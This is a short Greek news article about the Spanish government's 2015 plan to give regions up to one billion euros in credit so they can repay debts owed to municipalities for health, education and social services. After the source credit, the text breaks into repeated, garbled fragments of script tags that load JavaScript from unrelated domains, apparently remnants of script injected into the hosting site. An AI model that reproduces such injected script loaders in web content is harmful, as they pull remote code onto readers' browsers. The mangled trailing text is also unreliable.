Ισπανία: Η κυβέρνηση θα βοηθήσει τους χρεωμένους δήμους

Η ισπανική κυβέρνηση σχεδιάζει να χορηγήσει στους δήμους της χώρας πιστώσεις ύψους έως και ενός δισεκατομμυρίου ευρώ προκειμένου να τους βοηθήσει να ξεπληρώσουν τα χρέη τους στους τομείς της υγείας ή και της παιδείας, όπως ανακοινώθηκε από το υπουργείο Οικονομίας.

Το μέτρο αυτό εγγράφεται στον προϋπολογισμό του 2015, στον οποίο προβλέπεται μια σειρά μέτρων που έχουν ως στόχο να ενισχύσουν την οικονομική ανάκαμψη στην Ισπανία, οκτώ μήνες πριν από τις προσεχείς δημοτικές εκλογές.

Στο αποκορύφωμα της οικονομικής κρίσης, το 2012, η συντηρητική κυβέρνηση της Ισπανίας υποχρεώθηκε να σπεύσει σε βοήθεια των αυτόνομων περιοχών που βούλιαζαν κάτω από το βάρος των χρεών τους, δημιουργώντας ένα ειδικό ταμείο αρωγής. Όμως πολλοί δήμοι και κοινότητες, που εξαρτώνται από τις αυτόνομες περιφέρειες για τη χρηματοδότησή τους, διαμαρτύρονται ότι δεν επωφελήθηκαν από τα χρήματα αυτά για να ρυθμίσουν τα χρέη τους. Έτσι, η κυβέρνηση αποφάσισε να παραχωρήσει το 2015 ένα μέρος του ποσού αυτού για να βοηθήσει τις περιφέρειες να ρυθμίσουν τα χρέη που έχουν συσσωρεύσει εξ ονόματος των δήμων τους.

Σύμφωνα με πηγές του υπουργείου με τον τρόπο αυτό θα χορηγηθούν δάνεια στις περιφέρειες για να καταβάλουν στους δήμους τα χρήματα που οφείλουν στους τομείς των κοινωνικών υπηρεσιών, της υγείας και της εκπαίδευσης.

Ο υπουργός Οικονομίας Κριστόμπαλ Μοντόρο εξήγησε την περασμένη εβδομάδα, μιλώντας σε μέλη του κυβερνώντος Λαϊκού Κόμματος (PP) ότι είναι καθήκον του κράτους “να διασφαλίζει τη χρηματοδότηση του κράτους πρόνοιας” στις χρεωμένες πόλεις.

Πηγή: ΑΠΕ-ΜΠΕ
Πηγή:www.capital.gr___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >